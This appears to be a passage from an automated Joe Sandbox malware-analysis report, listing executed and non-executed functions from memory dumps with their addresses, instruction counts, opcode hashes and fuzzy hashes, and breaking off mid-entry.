                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9459904ea081838e89f2fa9ef0606d5a83a90e8cab44fef88cd2f302d9671eca
                                                        • Instruction ID: cda1b68ae788e0e4b1eeeb78c8ed7839c3e410c6d187740e5b9f3f48acd9a487
                                                        • Opcode Fuzzy Hash: 9459904ea081838e89f2fa9ef0606d5a83a90e8cab44fef88cd2f302d9671eca
                                                        • Instruction Fuzzy Hash: 0401C8B4D002499FCB40DFA8D951AAEBFF5BF08311F108196E954E7385D734AA81DFA1
                                                        Function 00FCD758 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1684799854.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_fcd000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d735b0efdea12cd51185b8f54b6dc490cc411d2127070495b88d3434e2424243
                                                        • Instruction ID: 04b250ccd3409116cccd59d5e18f822ea888b32987c3f3681039abdb53c0efb8
                                                        • Opcode Fuzzy Hash: d735b0efdea12cd51185b8f54b6dc490cc411d2127070495b88d3434e2424243
                                                        • Instruction Fuzzy Hash: 60F0C271405340AEE7208A0ADDC4B66FFA8EF50734F18C55EED084A286C379A840DAB0
                                                        Function 071807B3 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a22cb22f8c5e52aed7a685bb7ef3ba625d6148f51b0308b4387d800c73175ade
                                                        • Instruction ID: 23e2973ea93ff9e57ab1dc2a857ed2fdddbf24f8651303f40d7b6db09dcda453
                                                        • Opcode Fuzzy Hash: a22cb22f8c5e52aed7a685bb7ef3ba625d6148f51b0308b4387d800c73175ade
                                                        • Instruction Fuzzy Hash: 89F02E71A006189FDB585939C8551AF7AE7EFCD760F04813AE411D33D4DFB09D1599C1
                                                        Function 07186448 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9de5df22cf2e92cff6a6a258f0db7e7bde7e837a76f46a9cd3974e5bb202f727
                                                        • Instruction ID: 86a939b5367bde76fe4badda27729827825054d536ffc3f9ff6633655e82eae0
                                                        • Opcode Fuzzy Hash: 9de5df22cf2e92cff6a6a258f0db7e7bde7e837a76f46a9cd3974e5bb202f727
                                                        • Instruction Fuzzy Hash: D4F02771B202154F8B586A7CA41499E36EA9FCD2213244076E606CB365DE30CC019791
                                                        Function 07186F58 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb315c76389d41038f7eab9535b7f5233cc905243d7f5692d3ea378bfbb25871
                                                        • Instruction ID: 382ba4eb28940fb148b86fb0483a116d568493ae82e8e8b340eecaea06bf42ab
                                                        • Opcode Fuzzy Hash: cb315c76389d41038f7eab9535b7f5233cc905243d7f5692d3ea378bfbb25871
                                                        • Instruction Fuzzy Hash: A401FBB080021ADFDB55DF6AC4147AEBAF1FF48364F21C629E824AA291D7748A40CFD0
                                                        Function 07181440 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4d7308f7ce3c8fa54b356a9c746845a038986932c709910cccdd64e802c63e57
                                                        • Instruction ID: 36d864095a5d85fe96dd6907d7d95d1124fa1c31c82d5b6819ee969abf95986b
                                                        • Opcode Fuzzy Hash: 4d7308f7ce3c8fa54b356a9c746845a038986932c709910cccdd64e802c63e57
                                                        • Instruction Fuzzy Hash: 6BF027B231075957C3588A2B981042BBBDFEBC9291709C83FE10AC7260EB30D9435A90
                                                        Function 07188190 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cacde58c4735fe3bff62e9713df728792512b0ffe11d9829b67b5fcaca1ec306
                                                        • Instruction ID: 0cdd92f28cc2bbe583c69bc99a274978a9ad617510dd97c7724d117e0386f5e5
                                                        • Opcode Fuzzy Hash: cacde58c4735fe3bff62e9713df728792512b0ffe11d9829b67b5fcaca1ec306
                                                        • Instruction Fuzzy Hash: F4F0E972608208AFDF45EF98DC40C9A7FBADF05210B1480ABF404D72A2EB309910CB54
                                                        Function 07186FF8 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7aedaee26ed6e5a76c369bc64a83f1777bbfe5ee4f6b43a1d965d17f864de166
                                                        • Instruction ID: 4f2489f7ee8838aa6d6cf4ce4dca31ed73720873180dafec0b9c14ff6d190dc5
                                                        • Opcode Fuzzy Hash: 7aedaee26ed6e5a76c369bc64a83f1777bbfe5ee4f6b43a1d965d17f864de166
                                                        • Instruction Fuzzy Hash: 62E03972B001286F93049A6EDC84D6BBBEEEBCC664311807AF508C7310D9319D0086A0
                                                        Function 0718A96A Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3df23ffa6822a2f23a1bc20ca2500d369a14ed74d416275d1e9d10294e425b11
                                                        • Instruction ID: bb9e2d5e4b752a58ece6a15afb5b6faaabe7bb36e5c6f8a655538a09b36eaebe
                                                        • Opcode Fuzzy Hash: 3df23ffa6822a2f23a1bc20ca2500d369a14ed74d416275d1e9d10294e425b11
                                                        • Instruction Fuzzy Hash: 68F0E9B384D78683E36267BC68167A4BF686F12319F8F8295A4585B0D3CB658044DA51
                                                        Function 07184183 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2c0f7e74604d2befbf92670f3bbd5eed468a63ee7e5f150cf71f1322a4a97f6
                                                        • Instruction ID: 71af6dc651a18b12507264950e9595547fca0680a69455ae24faaf7660e50531
                                                        • Opcode Fuzzy Hash: d2c0f7e74604d2befbf92670f3bbd5eed468a63ee7e5f150cf71f1322a4a97f6
                                                        • Instruction Fuzzy Hash: 6AE092B73106654FC380AA6DD854A5A7BF5EB8D6107648074FA09CB3D4EE20EC028BA1
                                                        Function 071814B3 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4efe7cd08be4feaf1e430ff44ee942b10d0b2691c078c9d2ad5d9e34faf7534d
                                                        • Instruction ID: 916b24c1db8cf131a0a2159c420b1a383254c4a218da33554e080b3559ac7337
                                                        • Opcode Fuzzy Hash: 4efe7cd08be4feaf1e430ff44ee942b10d0b2691c078c9d2ad5d9e34faf7534d
                                                        • Instruction Fuzzy Hash: 81E09272700A6567E718962ADC01B67BBDAEBC9721F19C46DA80997385CA70AC0287D1
                                                        Function 0718BDB0 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7550ca563714ec9ffa65d6788fcd27a2fa7bcabc597e7ac1e08dc720e5df56ed
                                                        • Instruction ID: 96cf057b9c6bafba76f1fdfc5319782bb5b0c12c8f6bc656403bc8d7173fcdee
                                                        • Opcode Fuzzy Hash: 7550ca563714ec9ffa65d6788fcd27a2fa7bcabc597e7ac1e08dc720e5df56ed
                                                        • Instruction Fuzzy Hash: D0F0C9F4D19208EFCB54EFA8D545AADBFB8EB49300F0082A5E849A7351DB359A50EF40
                                                        Function 071814C0 Relevance: .0, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c97e539a5e15c4bb055410cb65274f819656ce33a2ba0d199443cf56609207f
                                                        • Instruction ID: 8963a3bd60d5695e6584603dd4906f4f14fd3ac2decbc7143d397bc947fee7af
                                                        • Opcode Fuzzy Hash: 4c97e539a5e15c4bb055410cb65274f819656ce33a2ba0d199443cf56609207f
                                                        • Instruction Fuzzy Hash: 7FE0863170065827D618566F9C01B6BBBDEEFC9720714C06DA409D7344CD606C0186D4
                                                        Function 0718FBB0 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6dc94d39e6bd0f72f91cb67ffade20ddf7e823875b8efe7895b7bdb4e3832298
                                                        • Instruction ID: b408e09738a0a3b0e79ff7996dae2a1703124ea6ab5607762f1dd1fd8e742dcd
                                                        • Opcode Fuzzy Hash: 6dc94d39e6bd0f72f91cb67ffade20ddf7e823875b8efe7895b7bdb4e3832298
                                                        • Instruction Fuzzy Hash: D9F03974D0120CEFCB45EFA8D945A8DBFF5EB48301F10C1A9A808A7350D7355A51EF41
                                                        Function 0718DEC0 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db04dcff4d952c03a835d536287ceb93486321e247e6fc06acc4ff52c550db13
                                                        • Instruction ID: 9a901cfd3a4dcdce2c9a41337d29adf8a17ee614bbc25c82fd95b628276333df
                                                        • Opcode Fuzzy Hash: db04dcff4d952c03a835d536287ceb93486321e247e6fc06acc4ff52c550db13
                                                        • Instruction Fuzzy Hash: 0CF06DB480434CEFCB15DFA9D404AADBFB8AB08301F10C1AAF894A6280C7359750EF60
                                                        Function 07184190 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d827b6912601206c2ad967cee9501e9331161b605352201e77f8504431bed6f8
                                                        • Instruction ID: ae992ab77ee9d686463799b5eb92bc96771aacca4638baf97aa90874c39643ef
                                                        • Opcode Fuzzy Hash: d827b6912601206c2ad967cee9501e9331161b605352201e77f8504431bed6f8
                                                        • Instruction Fuzzy Hash: 53E086723102144FC740EBA9D44495677F6ABCC520320C064F60AC7394EE30DC028B90
                                                        Function 071850CE Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8cd2e1560e89f1f7179073400cbdc642122900646cd87228fd7c0b743d257af
                                                        • Instruction ID: 52a598b0c7a7a3493b6b6183e8075c5d3cf0462d13dd22283ecb31af013ab674
                                                        • Opcode Fuzzy Hash: d8cd2e1560e89f1f7179073400cbdc642122900646cd87228fd7c0b743d257af
                                                        • Instruction Fuzzy Hash: 6FD05EB1E140089FC744AAA4EC444ECBB71E78F211F014422D122E7150E7300424CE84
                                                        Function 0718BE08 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a176847bc77082242a6efcd5d9d64c43ef68a62f09a81daba9492e469756a34d
                                                        • Instruction ID: 0a8656506c975dfbe2d57dc05b85f6cac0fcd3b6cda8983506e00c2984dacfbc
                                                        • Opcode Fuzzy Hash: a176847bc77082242a6efcd5d9d64c43ef68a62f09a81daba9492e469756a34d
                                                        • Instruction Fuzzy Hash: E0E0ECB0805308EFC715DFA4D505A9DBF75AB49311F5081A9E80426250CB315A90EF95
                                                        Function 0718A9C2 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 638d62a06dd51e778084d0811dd0c1382e7540de2b537c316375296915fde242
                                                        • Instruction ID: 72da8f8b656c2e8229103a8b4fee1e6b6a7672e9687df54c943ead9023046858
                                                        • Opcode Fuzzy Hash: 638d62a06dd51e778084d0811dd0c1382e7540de2b537c316375296915fde242
                                                        • Instruction Fuzzy Hash: BAD0A7F284814947C7651BA4686A3E8FF669F5532AF0A9291A84C175938766C412DE04
                                                        Function 071868D0 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05a96c91d32704b86855d716cd4709b27cd12f69c62b5e98cd3cf2f9c3c441bc
                                                        • Instruction ID: c7859907349aafd5d43c9cbd9b78ee5935925367a408f177f55a5320198c3b25
                                                        • Opcode Fuzzy Hash: 05a96c91d32704b86855d716cd4709b27cd12f69c62b5e98cd3cf2f9c3c441bc
                                                        • Instruction Fuzzy Hash: 04D0C9AA0197809EEB5327B48801846BF71BB63A6430A85D6D4A59A0B3D65054299B22
                                                        Function 07188169 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7ae4f629c56f61d88d94b64311647b6f835f7640f24c944f0fef95b8e21a54f
                                                        • Instruction ID: 9350e4be1c28c2a581ee4da1e227f916f875a31a046d67957e68fd830bb909be
                                                        • Opcode Fuzzy Hash: a7ae4f629c56f61d88d94b64311647b6f835f7640f24c944f0fef95b8e21a54f
                                                        • Instruction Fuzzy Hash: 63C02BF6074299DDC3C336F40D00C0C2C21E7217003EC04897104471C7CF108418CE23
                                                        Function 0718A978 Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a00cb1bcf87d1797e20b3a0e4ab4aa428f60b6569d5806cebf06d6e91e3c7dea
                                                        • Instruction ID: 4faa3f786db7aa6353f63b26cdd6c848c7cc9aac34eb9791609521b33ef8eb42
                                                        • Opcode Fuzzy Hash: a00cb1bcf87d1797e20b3a0e4ab4aa428f60b6569d5806cebf06d6e91e3c7dea
                                                        • Instruction Fuzzy Hash: 12C08C70040B088BC21177E4E90E728BF68AB08306F458612B00C060608F704050DA51
                                                        Function 07185470 Relevance: .0, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec8d8a9aad089ffcc758a3097020c70be6736ee7f929355dce03057ba2add3a7
                                                        • Instruction ID: e4ff620e88f5e50eda00a8297f634d96a09037c170495dada48d100369a7dede
                                                        • Opcode Fuzzy Hash: ec8d8a9aad089ffcc758a3097020c70be6736ee7f929355dce03057ba2add3a7
                                                        • Instruction Fuzzy Hash: 19D002B4D28309CFCB44DF94D5596EDBBB6FB5A302F218115E41AA7280DB74AE52CF40
                                                        Function 07183AE4 Relevance: .0, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 626c1842fafbe0c4d2dd25543a652ab667a5541d4c09ca2f73e9a285768de646
                                                        • Instruction ID: d64cedc10f4f9e51aba9244810850880436c473a4d4b8cc462809ac13b1b9d07
                                                        • Opcode Fuzzy Hash: 626c1842fafbe0c4d2dd25543a652ab667a5541d4c09ca2f73e9a285768de646
                                                        • Instruction Fuzzy Hash: 9EC09B76015104DEC645BF54CDC5C99BAA5FF97B00F85DC52E154850B1CB21C428BF17
                                                        Function 0718728C Relevance: .0, Instructions: 8COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7559a2a79c7bbe19f58adb7643791deb9aa3fdba1aefd7f3d532c4a771973899
                                                        • Instruction ID: f488f974e6475475545dc5b43bc59ad368c9012a2324141efb5f484c03496af8
                                                        • Opcode Fuzzy Hash: 7559a2a79c7bbe19f58adb7643791deb9aa3fdba1aefd7f3d532c4a771973899
                                                        • Instruction Fuzzy Hash: 4CB012E61B4204E5C18937B848C097F6811EBB6700FD09C157745000C08F304435BB1F
                                                        Function 07180DA9 Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8cc4773c4ae0f931e685c7564d829a1848aa13e4facf2d7c7389c1b67f6ef6b
                                                        • Instruction ID: 02ed8e93c9cccfa314ea06b0c9f38955e605c9c8f89940e4e712a1915d4d475b
                                                        • Opcode Fuzzy Hash: b8cc4773c4ae0f931e685c7564d829a1848aa13e4facf2d7c7389c1b67f6ef6b
                                                        • Instruction Fuzzy Hash: 50C08C70200204CFCB0ACB50D10446A7BB2FF0D2067204018E00212250C731EC01CF00
                                                        Function 07182C34 Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbfa58f356b99229c348530ab5ca6bcc514e49f931a7ddfc92a8ec9444f458ae
                                                        • Instruction ID: 0a2550bc13ca91716a4bc827572664a3fac4893483755e120e3d73700a2afbc1
                                                        • Opcode Fuzzy Hash: dbfa58f356b99229c348530ab5ca6bcc514e49f931a7ddfc92a8ec9444f458ae
                                                        • Instruction Fuzzy Hash: 85C09B70D3012485C349F774D980D5C6791FF81700F415D395405660E6DF706D496941
                                                        Function 07184AD1 Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a0327d2cbe45ffc86a4b28bdc81ffe188f04f1ff6a1ac03bd35b4af0cca6adb7
                                                        • Instruction ID: 6ca15a30d7e9f320e67893c67e1463a31ea15a92f388f7da3d909e55ef9a5f4d
                                                        • Opcode Fuzzy Hash: a0327d2cbe45ffc86a4b28bdc81ffe188f04f1ff6a1ac03bd35b4af0cca6adb7
                                                        • Instruction Fuzzy Hash: 34A0018BC54BAA26DB852958ACB238A0A78F7B6655FE960A0C0158E241E42882093662

                                                        Non-executed Functions

                                                        Function 02C271A0 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHfq$PHfq
                                                        • API String ID: 0-3546021038
                                                        • Opcode ID: 7afd5e65e0eb53c2e7502f85a8190d88ba8d1e26f121ab73d4f6010daa9d35de
                                                        • Instruction ID: e01cd3081b2ed2a6a5496642793c1544da3d7388b5fc5eada0e6770a57edf622
                                                        • Opcode Fuzzy Hash: 7afd5e65e0eb53c2e7502f85a8190d88ba8d1e26f121ab73d4f6010daa9d35de
                                                        • Instruction Fuzzy Hash: 8ED1B574A00614CFDB18DF69C598AA9B7F2BF8D705F2580A8E405AB361DB31ED49CF60
                                                        Function 02C21710 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: r'O
                                                        • API String ID: 0-1944033994
                                                        • Opcode ID: 31243ea55df5a4e0c2e814a7c0d755c5a5e81f65853991a2e02fa1113e2209e2
                                                        • Instruction ID: 2dcc98bddb1bfd07faa14f2ec2561cf94f89c72a13c9cc9be186bd82a6eb928f
                                                        • Opcode Fuzzy Hash: 31243ea55df5a4e0c2e814a7c0d755c5a5e81f65853991a2e02fa1113e2209e2
                                                        • Instruction Fuzzy Hash: 7DE1EA74E001198FCB14DF99C580AAEBBF2FF89304F249169D818AB356DB70AD46CF60
                                                        Function 07182450 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ax^
                                                        • API String ID: 0-994873808
                                                        • Opcode ID: 72b32d054e86c48261d9ba72780414dbb7eeeb02f2a0cab5fa4fe44a0f177a94
                                                        • Instruction ID: bb4f5afc8be9186b1d1a169bde52ce69b035a7c7de903b83c8ac6875b129da85
                                                        • Opcode Fuzzy Hash: 72b32d054e86c48261d9ba72780414dbb7eeeb02f2a0cab5fa4fe44a0f177a94
                                                        • Instruction Fuzzy Hash: E541C3B5F2420A8FCB85DF99C8915AEBBF5BB89200F1A8126D405E7391C374D901CFA1
                                                        Function 07182460 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ax^
                                                        • API String ID: 0-994873808
                                                        • Opcode ID: 702e1a47e3ff68f44733ae2c7a99a944d3a9667b1f0ad6638c5759b34cb940cc
                                                        • Instruction ID: 0d849eacce6740b5967c4a5b49441105dae4174dc9e9d5e3ce0389d4a916e65b
                                                        • Opcode Fuzzy Hash: 702e1a47e3ff68f44733ae2c7a99a944d3a9667b1f0ad6638c5759b34cb940cc
                                                        • Instruction Fuzzy Hash: 9C41A3B5F2420A8FCB84DF99C8919AEF7F5BB89200F1A8126D505EB390D374D901CFA1
                                                        Function 02C26278 Relevance: .3, Instructions: 337COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
